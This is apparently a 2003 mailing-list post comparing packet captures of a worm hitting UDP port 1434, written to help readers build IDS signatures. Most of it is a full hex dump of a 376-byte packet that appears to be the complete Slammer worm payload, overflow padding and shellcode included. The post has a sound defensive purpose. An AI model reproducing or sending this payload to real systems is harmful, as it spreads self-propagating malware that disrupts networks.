At 12:45 AM 1/25/2003, you wrote:

01:42:04.040462 > x.x.x.x.1434:  rad-account-req
376 [id 1] Attr[  User User User User User User User User User User User
User User User User User User User User User User User User User User User
User User User User User User User [|radius]

That is the traffic...

Either I'm seeing something different, or you're decoding the packets differently... Or there are two worms? In any case, this is what we're seeing:

03:00:16.926474 64.57.XXX.XXX.2821 > XX.XXX.XXX.XXX.1434: udp 376
0x0000   4500 0194 388e 0000 7211 0000 4039 XXXX        [EMAIL PROTECTED]
0x0010   XXXX XXXX 0b05 059a 0180 6190 0401 0101        ..........a.....
0x0020   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0030   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0040   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0050   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0060   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0070   0101 0101 0101 0101 0101 0101 01dc c9b0        ................
0x0080   42eb 0e01 0101 0101 0101 70ae 4201 70ae        B.........p.B.p.
0x0090   4290 9090 9090 9090 9068 dcc9 b042 b801        B........h...B..
0x00a0   0101 0131 c9b1 1850 e2fd 3501 0101 0550        ...1...P..5....P
0x00b0   89e5 5168 2e64 6c6c 6865 6c33 3268 6b65        ..Qh.dllhel32hke
0x00c0   726e 5168 6f75 6e74 6869 636b 4368 4765        rnQhounthickChGe
0x00d0   7454 66b9 6c6c 5168 3332 2e64 6877 7332        tTf.llQh32.dhws2
0x00e0   5f66 b965 7451 6873 6f63 6b66 b974 6f51        _f.etQhsockf.toQ
0x00f0   6873 656e 64be 1810 ae42 8d45 d450 ff16        hsend....B.E.P..
0x0100   508d 45e0 508d 45f0 50ff 1650 be10 10ae        P.E.P.E.P..P....
0x0110   428b 1e8b 033d 558b ec51 7405 be1c 10ae        B....=U..Qt.....
0x0120   42ff 16ff d031 c951 5150 81f1 0301 049b        B....1.QQP......
0x0130   81f1 0101 0101 518d 45cc 508b 45c0 50ff        ......Q.E.P.E.P.
0x0140   166a 116a 026a 02ff d050 8d45 c450 8b45        .j.j.j...P.E.P.E
0x0150   c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45        .P........<a...E
0x0160   b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829        ...@...........)
0x0170   c28d 0490 01d8 8945 b46a 108d 45b0 5031        .......E.j..E.P1
0x0180   c951 6681 f178 0151 8d45 0350 8b45 ac50        .Qf..x.Q.E.P.E.P
0x0190   ffd6 ebca                                      ....

Not saying that isn't what you saw, just letting people know what else to expect if they're trying to setup IDS signatures....

(sending this email in plain and HTML, to help some email clients format that correctly - excuse the HTML for everyone else)

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